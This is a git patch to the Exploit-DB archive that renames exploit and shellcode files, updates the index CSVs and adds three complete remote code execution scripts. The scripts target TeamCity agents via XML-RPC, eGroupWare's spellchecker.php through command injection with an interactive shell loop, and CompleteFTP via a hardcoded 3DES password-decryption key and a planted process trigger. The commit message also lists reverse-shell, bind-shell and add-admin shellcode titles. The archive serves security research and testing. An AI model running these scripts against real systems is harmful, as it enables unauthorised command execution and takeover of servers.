From 720fabd0666423c25675eb8ff42161ec1264fd65 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 28 Jul 2020 05:01:59 +0000
Subject: [PATCH] DB: 2020-07-28

114 changes to exploits/shellcodes

Notepad++ < 7.7 (x64) - Denial of Service
winrar 5.80 64bit - Denial of Service
WinRAR 5.80 (x64) - Denial of Service
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation
TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change
Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)
Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)
Microsoft Word 2007 (x86) - Information Disclosure
IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation
ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution
Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation
R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)
MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation
MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation
Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation
Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation
R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation
Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation
Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path
DEWESoft X3 SP1 (64-bit) - Remote Command Execution
DEWESoft X3 SP1 (x64) - Remote Command Execution
CompleteFTP Professional 12.1.3 - Remote Code Execution
TeamCity Agent XML-RPC 10.0 - Remote Code Execution
eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution
FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)
FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)
Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)
Linux/x86 - Kill All Processes Shellcode (14 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
---
 .../{linux => linux_x86-64}/local/44299.c | 0
 .../{linux => linux_x86-64}/local/44300.c | 0
 .../{linux => linux_x86-64}/local/44302.c | 0
 .../{linux => linux_x86-64}/local/45516.c | 0
 exploits/{linux => linux_x86}/local/46249.py | 0
 exploits/php/webapps/48201.py | 353 ++++++++++++++++++
 exploits/php/webapps/48720.py | 51 +++
 exploits/windows/remote/48657.py | 332 ++++++++++++++++
 .../{windows => windows_x86-64}/dos/47393.txt | 0
 .../{windows => windows_x86-64}/dos/47525.txt | 0
 .../{windows => windows_x86-64}/local/43139.c | 0
 .../local/45738.py | 0
 .../local/47122.py | 0
 .../{linux => windows_x86-64}/local/47170.c | 0
 .../remote/44275.txt | 0
 .../{windows => windows_x86}/local/38457.c | 0
 .../{windows => windows_x86}/local/42432.cpp | 0
 .../{windows => windows_x86}/local/42930.txt | 0
 .../{windows => windows_x86}/local/43366.md | 0
 .../{windows => windows_x86}/local/46507.py | 0
 .../{windows => windows_x86}/local/46918.txt | 0
 .../{windows => windows_x86}/local/47176.cpp | 0
 .../{windows => windows_x86}/local/48314.py | 0
 .../{windows => windows_x86}/local/48352.txt | 0
 files_exploits.csv | 51 +--
 files_shellcodes.csv | 34 +-
 shellcodes/{linux => linux_x86-64}/48379.c | 0
 shellcodes/{linux => linux_x86}/45940.nasm | 0
 shellcodes/{linux => linux_x86}/46039.c | 0
 shellcodes/{linux => linux_x86}/47481.c | 0
 shellcodes/{linux => linux_x86}/47511.c | 0
 shellcodes/{linux => linux_x86}/47513.c | 0
 shellcodes/{linux => linux_x86}/47514.c | 0
 shellcodes/{linux => linux_x86}/47530.txt | 0
 shellcodes/{linux => linux_x86}/47564.py | 0
 shellcodes/{linux => linux_x86}/47877.c | 0
 shellcodes/{linux => linux_x86}/47890.c | 0
 shellcodes/{linux => linux_x86}/48032.py | 0
 shellcodes/{linux => linux_x86}/48243.txt | 0
 .../{windows => windows_x86-64}/48229.txt | 0
 shellcodes/{windows => windows_x86}/47980.txt | 0
 shellcodes/{windows => windows_x86}/48355.c | 0
 42 files changed, 780 insertions(+), 41 deletions(-)
 rename exploits/{linux => linux_x86-64}/local/44299.c (100%)
 rename exploits/{linux => linux_x86-64}/local/44300.c (100%)
 rename exploits/{linux => linux_x86-64}/local/44302.c (100%)
 rename exploits/{linux => linux_x86-64}/local/45516.c (100%)
 rename exploits/{linux => linux_x86}/local/46249.py (100%)
 create mode 100755 exploits/php/webapps/48201.py
 create mode 100755 exploits/php/webapps/48720.py
 create mode 100755 exploits/windows/remote/48657.py
 rename exploits/{windows => windows_x86-64}/dos/47393.txt (100%)
 rename exploits/{windows => windows_x86-64}/dos/47525.txt (100%)
 rename exploits/{windows => windows_x86-64}/local/43139.c (100%)
 rename exploits/{windows => windows_x86-64}/local/45738.py (100%)
 rename exploits/{windows => windows_x86-64}/local/47122.py (100%)
 rename exploits/{linux => windows_x86-64}/local/47170.c (100%)
 rename exploits/{windows => windows_x86-64}/remote/44275.txt (100%)
 rename exploits/{windows => windows_x86}/local/38457.c (100%)
 rename exploits/{windows => windows_x86}/local/42432.cpp (100%)
 rename exploits/{windows => windows_x86}/local/42930.txt (100%)
 rename exploits/{windows => windows_x86}/local/43366.md (100%)
 rename exploits/{windows => windows_x86}/local/46507.py (100%)
 rename exploits/{windows => windows_x86}/local/46918.txt (100%)
 rename exploits/{windows => windows_x86}/local/47176.cpp (100%)
 rename exploits/{windows => windows_x86}/local/48314.py (100%)
 rename exploits/{windows => windows_x86}/local/48352.txt (100%)
 rename shellcodes/{linux => linux_x86-64}/48379.c (100%)
 rename shellcodes/{linux => linux_x86}/45940.nasm (100%)
 rename shellcodes/{linux => linux_x86}/46039.c (100%)
 rename shellcodes/{linux => linux_x86}/47481.c (100%)
 rename shellcodes/{linux => linux_x86}/47511.c (100%)
 rename shellcodes/{linux => linux_x86}/47513.c (100%)
 rename shellcodes/{linux => linux_x86}/47514.c (100%)
 rename shellcodes/{linux => linux_x86}/47530.txt (100%)
 rename shellcodes/{linux => linux_x86}/47564.py (100%)
 rename shellcodes/{linux => linux_x86}/47877.c (100%)
 rename shellcodes/{linux => linux_x86}/47890.c (100%)
 rename shellcodes/{linux => linux_x86}/48032.py (100%)
 rename shellcodes/{linux => linux_x86}/48243.txt (100%)
 rename shellcodes/{windows => windows_x86-64}/48229.txt (100%)
 rename shellcodes/{windows => windows_x86}/47980.txt (100%)
 rename shellcodes/{windows => windows_x86}/48355.c (100%)
diff --git a/exploits/linux/local/44299.c b/exploits/linux_x86-64/local/44299.c similarity index 100% rename from exploits/linux/local/44299.c rename to exploits/linux_x86-64/local/44299.c diff --git a/exploits/linux/local/44300.c b/exploits/linux_x86-64/local/44300.c similarity index 100% rename from exploits/linux/local/44300.c rename to exploits/linux_x86-64/local/44300.c diff --git a/exploits/linux/local/44302.c b/exploits/linux_x86-64/local/44302.c similarity index 100% rename from exploits/linux/local/44302.c rename to exploits/linux_x86-64/local/44302.c diff --git a/exploits/linux/local/45516.c b/exploits/linux_x86-64/local/45516.c similarity index 100% rename from exploits/linux/local/45516.c rename to exploits/linux_x86-64/local/45516.c diff --git a/exploits/linux/local/46249.py b/exploits/linux_x86/local/46249.py similarity index 100% rename from exploits/linux/local/46249.py rename to exploits/linux_x86/local/46249.py diff --git a/exploits/php/webapps/48201.py b/exploits/php/webapps/48201.py new file mode 100755 index 000000000..ffe02324e --- /dev/null +++ b/exploits/php/webapps/48201.py 
@@ -0,0 +1,353 @@ +# Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution +# Date: 2020-03-20 +# Exploit Author: Dylan Pindur +# Vendor Homepage: https://www.jetbrains.com/teamcity/ +# Version: TeamCity < 10.0 (42002) +# Tested on: Windows 10 (x64) +# References: +# https://www.exploit-db.com/exploits/45917 +# https://www.tenable.com/plugins/nessus/94675 +# +# TeamCity Agents configured to use bidirectional communication allow the execution +# of commands sent to them via an XML-RPC endpoint. +# +# This script requires the following python modules are installed +# pip install requests +# +#!/usr/local/bin/python3 + +import requests +import sys + +# region tc7 +teamcity_7_req = """ + + + buildAgent.runBuild + + + + + 123456 + x + ON_AGENT + x + + + + system.build.number + 0 + + + + + + + + + + + + + + + + + + + + simpleRunner + x + + + + script.content + {SCRIPT} + + + teamcity.step.mode + default + + + use.custom.script + true + + + + + + teamcity.build.step.name + x + + + + + 3 + + + ]]> + + + + +""".strip() +# endregion + +# region tc8 +teamcity_8_req = """ + + + buildAgent.runBuild + + + + + 123456 + x + ON_AGENT + x + + + system.build.number + 0 + + + + + + + + + + + + + + + + x + false + simpleRunner + x + + + + teamcity.build.step.name + x + + + + + script.content + {SCRIPT} + + + teamcity.step.mode + default + + + use.custom.script + true + + + + + 3 + + + ]]> + + + + +""".strip() +# endregion + +# region tc9 +teamcity_9_req = """ + + + buildAgent.runBuild + + + + + 123456 + x + x + ON_AGENT + x + 3 + + system.build.number + 0 + + + + + + + + + + + + + + + + x + false + simpleRunner + x + + + + teamcity.build.step.name + x + + + + + script.content + {SCRIPT} + + + teamcity.step.mode + default + + + use.custom.script + true + + + + + + ]]> + + + + +""".strip() +# endregion + +# region tc10 +teamcity_10_req = """ + + + buildAgent.runBuild + + + + + 123456 + x + x + ON_AGENT + x + 123456 + x + 3 + + system.build.number + 0 + + + + + + + + + + + + 
+ + + + + x + false + simpleRunner + x + + + + teamcity.build.step.name + x + + + + + script.content + {SCRIPT} + + + teamcity.step.mode + default + + + use.custom.script + true + + + + + + ]]> + + + + +""".strip() +# endregion + +def prepare_payload(version, cmd): + if version == 7: + return teamcity_7_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) + elif version == 8: + return teamcity_8_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) + elif version == 9: + return teamcity_9_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) + elif version == 10: + return teamcity_10_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) + else: + raise Exception("No payload available for version {}".format(version)) + +def send_req(host, port, payload): + headers = { + "Content-Type": "text/xml" + } + url = "http://{}:{}/".format(host, port) + r = requests.post(url, headers=headers, data=payload) + if r.status_code == 200 and 'fault' not in r.text: + print('Command sent successfully') + else: + print('Command failed') + print(r.text) + + +if len(sys.argv) != 4: + print('[!] Missing arguments') + print('[ ] Usage: {} '.format(sys.argv[0])) + print("[ ] E.g. {} 192.168.1.128 9090 'whoami > C:\\x.txt'".format(sys.argv[0])) + sys.exit(1) + +target = sys.argv[1] +port = int(sys.argv[2]) +cmd = sys.argv[3] + +version = input("Enter TeamCity version (7,8,9,10): ") +version = int(version.strip()) +if version not in [7, 8, 9, 10]: + print("Please select a valid version (7,8,9,10)") + sys.exit(1) + +payload = prepare_payload(version, cmd) +send_req(target, str(port), payload) \ No newline at end of file diff --git a/exploits/php/webapps/48720.py b/exploits/php/webapps/48720.py new file mode 100755 index 000000000..bfc5649ac --- /dev/null +++ b/exploits/php/webapps/48720.py 
@@ -0,0 +1,51 @@ +# Exploit Title: eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution +# Date: 2020-07-27 +# Exploit Author: Berk KIRAS +# Vendor Homepage: https://www.egroupware.org/en/ +# Version: 1.14 +# Tested on: Apache +# Berk KIRAS PwC - Cyber Security Specialist + + +#!/usr/bin/python3 + +import requests +import sys +import threading +import urllib + +def send_req(command): + #Headers + my_datas_headers ={ + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", + "Accept": "text/javascript, text/html, application/xml, text/xml, */*", + "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-type": "application/json; charset=UTF-8", + "Connection": "close", + } + #If you want to edit and add headers some headers added + s = requests.session() + #if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'} + s.headers.update(my_datas_headers) + params={"q":"||"+command+"||"} + command_encoded = urllib.urlencode(params) + command_encoded = command_encoded.split("=")[1] + r = s.get(sys.argv[1]+"://"+sys.argv[2]+"/egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/"+"spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl"+command_encoded) + return r.content + +def main(): + if(len(sys.argv) < 3): + print("Usage:exploit.py ") + sys.exit(0) + else: + try: + while True: + cmd = raw_input("CMD_>") + resp=send_req(cmd).split(";")[5].split("2>&1")[1] + print(resp) + + except Exception: + print(Exception) + +main() \ No newline at end of file diff --git a/exploits/windows/remote/48657.py b/exploits/windows/remote/48657.py new file mode 100755 index 000000000..1509cde3f --- /dev/null +++ b/exploits/windows/remote/48657.py 
@@ -0,0 +1,332 @@ +# Exploit Title: CompleteFTP Professional 12.1.3 - Remote Code Execution +# Date: 2020-03-11 +# Exploit Author: 1F98D +# Original Author: Rhino Security Labs +# Vendor Homepage: https://enterprisedt.com/products/completeftp/ +# Version: CompleteFTP Professional +# Tested on: Windows 10 (x64) +# CVE: CVE‑2019‑16116 +# References: +# https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/ +# https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-16116 +# +# CompleteFTP before 12.1.3 logs an obscured administrator password to a file +# during installation (C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log) +# if CompleteFTP is configured to permit remote administration (over port 14983) it +# is possible to obtain remote code execution through the administration interface +# +# This script requires the following python modules are installed +# pip install paramiko pycryptodome uuid +# +#!/usr/local/bin/python3 + +from paramiko.sftp import CMD_EXTENDED +from base64 import b64encode, b64decode +from Crypto.Util.Padding import unpad +from Crypto.Cipher import DES3 +import xml.etree.ElementTree as ET +import paramiko +import struct +import uuid +import sys + +# region get_server_info +get_server_info = """ + + + + + + +""".strip() +# endregion + +# region update_config +update_config = """ + + + + + + + +{XMLSCHEMA} +{XMLDIFFGRAM} + + +<_Major>2 +<_Minor>0 +<_Build>-1 +<_Revision>-1 + + + +""".strip() +# endregion + +# region xml_schema +xml_schema = """ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +""".replace("<", "<").replace(">", ">").replace('"', """).strip() +# endregion + +# region xml_diffgram +xml_diffgram = """ + + + + 88428040-73b3-4497-9b6d-69af2f1cc3c7 + Process Execution + EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger + 2 + {CONFIGURATION} + 
2020-03-10T18:33:41.107+08:00 + 2020-03-10T10:52:00.7496654+08:00 + false + true + {ID} + + + 2 + Event + 2009-06-29T11:48:00+08:00 + 2009-06-29T11:48:00+08:00 + + + + 3 + 2020-03-10T10:50:44.4209655+08:00 + 2020-03-10T10:50:44.4209655+08:00 + true + + + + + 88428040-73b3-4497-9b6d-69af2f1cc3c7 + Process Execution + EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger + 2 + + 2020-03-10T18:33:41.107+08:00 + 2020-03-10T10:50:44.4209655+08:00 + false + true + + + + +""".strip() +# endregion + +# region config +config = """ + + + 0 + 10 + 0 + 0 + true + + + 1 + 0 + trigger + true + 0 + cmd.exe + /c {CMD} + * + false + true + 1 + + + 1 + LogIn + + +""".strip() +# endregion + +def prepare_update_config(uuid, cmd): + config_payload = config + config_payload = config_payload.replace('{CMD}', cmd) + config_payload = config_payload.replace('<', '<') + config_payload = config_payload.replace('>', '>') + + diffgram_payload = xml_diffgram + diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload) + diffgram_payload = diffgram_payload.replace('{ID}', uuid) + diffgram_payload = diffgram_payload.replace('&', '&') + diffgram_payload = diffgram_payload.replace('<', '<') + diffgram_payload = diffgram_payload.replace('>', '>') + diffgram_payload = diffgram_payload.replace('"', '"') + + payload = update_config + payload = payload.replace('{XMLSCHEMA}', xml_schema) + payload = payload.replace('{XMLDIFFGRAM}', diffgram_payload) + + return payload + +def send_request(sftp, payload): + payload = b64encode(bytes(payload, 'utf-8')).decode('utf-8') + res = sftp._request(CMD_EXTENDED, 'admin@enterprisedt.com', 'SOAP64 ' + payload) + return res + +def convert_changeset_id_to_uuid(changeset_id): + a = struct.pack('i', int(changeset_id[0].text)) # 32 + b = struct.pack('h', int(changeset_id[1].text)) # 16 + c = struct.pack('h', int(changeset_id[2].text)) # 16 + d = struct.pack('B', int(changeset_id[3].text)) # 8 + e = struct.pack('B', int(changeset_id[4].text)) # 8 + f = 
struct.pack('B', int(changeset_id[5].text)) # 8 + g = struct.pack('B', int(changeset_id[6].text)) # 8 + h = struct.pack('B', int(changeset_id[7].text)) # 8 + i = struct.pack('B', int(changeset_id[8].text)) # 8 + j = struct.pack('B', int(changeset_id[9].text)) # 8 + k = struct.pack('B', int(changeset_id[10].text)) # 8 + + x = a + b + c + d + e + f + g + h + i + j + k + return uuid.UUID(bytes_le=x) + +def get_uuid(sftp): + res = send_request(sftp, get_server_info) + if res[0] != 201: + print('[!] Error could not request server info via SFTP') + sys.exit(1) + + res = b64decode(res[1].get_string()).decode('utf-8') + res = ET.fromstring(res) + changeset_id = res.find('.//SyncChangeSetID') + uuid = convert_changeset_id_to_uuid(changeset_id) + return str(uuid) + +def login(host, port, user, password): + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + ssh.connect(host, port, user, password, look_for_keys=False) + return ssh.open_sftp() + +def send_command(sftp, cmd): + uuid = get_uuid(sftp) + payload = prepare_update_config(uuid, cmd) + res = send_request(sftp, payload) + if res[0] != 201: + print('[!] Error could not send update config request via SFTP') + sys.exit(1) + +def decrypt_password(password): + key = b64decode('HKVV76GdVuzXne/zxtWvdjA2d2Am548E') + iv = b64decode('gVGow/9uLvM=') + encrypted = b64decode(password) + cipher = DES3.new(key=key, iv=iv, mode=DES3.MODE_CBC) + decrypted = cipher.decrypt(encrypted) + return unpad(decrypted, 8).decode('utf-16') + +if len(sys.argv) != 6: + print('[!] Missing arguments') + print('[ ] Usage: {} '.format(sys.argv[0])) + print("[ ] E.g. 
{} 192.168.1.128 14983 admin DEomw27OY7sYZs4XjYA2kVB4LEB5skN4 'whoami > C:\\x.txt'".format(sys.argv[0])) + sys.exit(1) + +target = sys.argv[1] +port = int(sys.argv[2]) +username = sys.argv[3] +password = sys.argv[4] +cmd = sys.argv[5] + +print('[ ] Decrypting password') +password = decrypt_password(password) +print('[ ] Decrypted password is "{}"'.format(password)) + +print('[ ] Logging in') +sftp = login(target, port, username, password) + +print('[ ] Sending command') +send_command(sftp, cmd) + +print('[ ] Command successfully sent, triggering...') +sftp = login(target, port, username, password) \ No newline at end of file diff --git a/exploits/windows/dos/47393.txt b/exploits/windows_x86-64/dos/47393.txt similarity index 100% rename from exploits/windows/dos/47393.txt rename to exploits/windows_x86-64/dos/47393.txt diff --git a/exploits/windows/dos/47525.txt b/exploits/windows_x86-64/dos/47525.txt similarity index 100% rename from exploits/windows/dos/47525.txt rename to exploits/windows_x86-64/dos/47525.txt diff --git a/exploits/windows/local/43139.c b/exploits/windows_x86-64/local/43139.c similarity index 100% rename from exploits/windows/local/43139.c rename to exploits/windows_x86-64/local/43139.c diff --git a/exploits/windows/local/45738.py b/exploits/windows_x86-64/local/45738.py similarity index 100% rename from exploits/windows/local/45738.py rename to exploits/windows_x86-64/local/45738.py diff --git a/exploits/windows/local/47122.py b/exploits/windows_x86-64/local/47122.py similarity index 100% rename from exploits/windows/local/47122.py rename to exploits/windows_x86-64/local/47122.py diff --git a/exploits/linux/local/47170.c b/exploits/windows_x86-64/local/47170.c similarity index 100% rename from exploits/linux/local/47170.c rename to exploits/windows_x86-64/local/47170.c 
diff --git a/exploits/windows/remote/44275.txt b/exploits/windows_x86-64/remote/44275.txt similarity index 100% rename from exploits/windows/remote/44275.txt rename to exploits/windows_x86-64/remote/44275.txt diff --git a/exploits/windows/local/38457.c b/exploits/windows_x86/local/38457.c similarity index 100% rename from exploits/windows/local/38457.c rename to exploits/windows_x86/local/38457.c diff --git a/exploits/windows/local/42432.cpp b/exploits/windows_x86/local/42432.cpp similarity index 100% rename from exploits/windows/local/42432.cpp rename to exploits/windows_x86/local/42432.cpp diff --git a/exploits/windows/local/42930.txt b/exploits/windows_x86/local/42930.txt similarity index 100% rename from exploits/windows/local/42930.txt rename to exploits/windows_x86/local/42930.txt diff --git a/exploits/windows/local/43366.md b/exploits/windows_x86/local/43366.md similarity index 100% rename from exploits/windows/local/43366.md rename to exploits/windows_x86/local/43366.md diff --git a/exploits/windows/local/46507.py b/exploits/windows_x86/local/46507.py similarity index 100% rename from exploits/windows/local/46507.py rename to exploits/windows_x86/local/46507.py diff --git a/exploits/windows/local/46918.txt b/exploits/windows_x86/local/46918.txt similarity index 100% rename from exploits/windows/local/46918.txt rename to exploits/windows_x86/local/46918.txt diff --git a/exploits/windows/local/47176.cpp b/exploits/windows_x86/local/47176.cpp similarity index 100% rename from exploits/windows/local/47176.cpp rename to exploits/windows_x86/local/47176.cpp diff --git a/exploits/windows/local/48314.py b/exploits/windows_x86/local/48314.py similarity index 100% rename from exploits/windows/local/48314.py rename to exploits/windows_x86/local/48314.py diff --git a/exploits/windows/local/48352.txt b/exploits/windows_x86/local/48352.txt similarity index 100% rename from exploits/windows/local/48352.txt rename to exploits/windows_x86/local/48352.txt 
diff --git a/files_exploits.csv b/files_exploits.csv index a47226220..0c72d14a4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6579,7 +6579,7 @@ id,file,description,date,author,type,platform,port 47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows, 47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows, 47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows, -47393,exploits/windows/dos/47393.txt,"Notepad++ < 7.7 (x64) - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows, +47393,exploits/windows_x86-64/dos/47393.txt,"Notepad++ < 7.7 (x64) - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows_x86-64, 47404,exploits/watchos/dos/47404.pl,"SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service",2019-09-20,"Emilio Revelo",dos,watchos, 47406,exploits/watchos/dos/47406.py,"InputMapper 1.6.10 - Denial of Service",2019-09-23,elkoyote07,dos,watchos, 47410,exploits/windows/dos/47410.py,"DeviceViewer 3.12.0.1 - 'creating user' Denial of Service",2019-09-24,x00pwn,dos,windows, 
@@ -6602,7 +6602,7 @@ id,file,description,date,author,type,platform,port 47489,exploits/windows/dos/47489.txt,"Microsoft Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows, 47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows, 47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows, -47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows, +47525,exploits/windows_x86-64/dos/47525.txt,"WinRAR 5.80 (x64) - Denial of Service",2019-10-21,alblalawi,dos,windows_x86-64, 47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows, 47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple, 47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows, 
@@ -10032,7 +10032,7 @@ id,file,description,date,author,type,platform,port 40025,exploits/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",local,linux, 40039,exploits/windows_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)",2016-06-29,blomster81,local,windows_x86, 40040,exploits/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,local,windows, -40049,exploits/linux_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,linux_x86-64, +40049,exploits/linux_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,linux_x86-64, 40066,exploits/android/local/40066.txt,"Samsung Android JACK - Local Privilege Escalation",2016-07-06,"Google Security Research",local,android, 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows, 40071,exploits/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Local Privilege Escalation",2016-07-08,sh4d0wman,local,windows, 
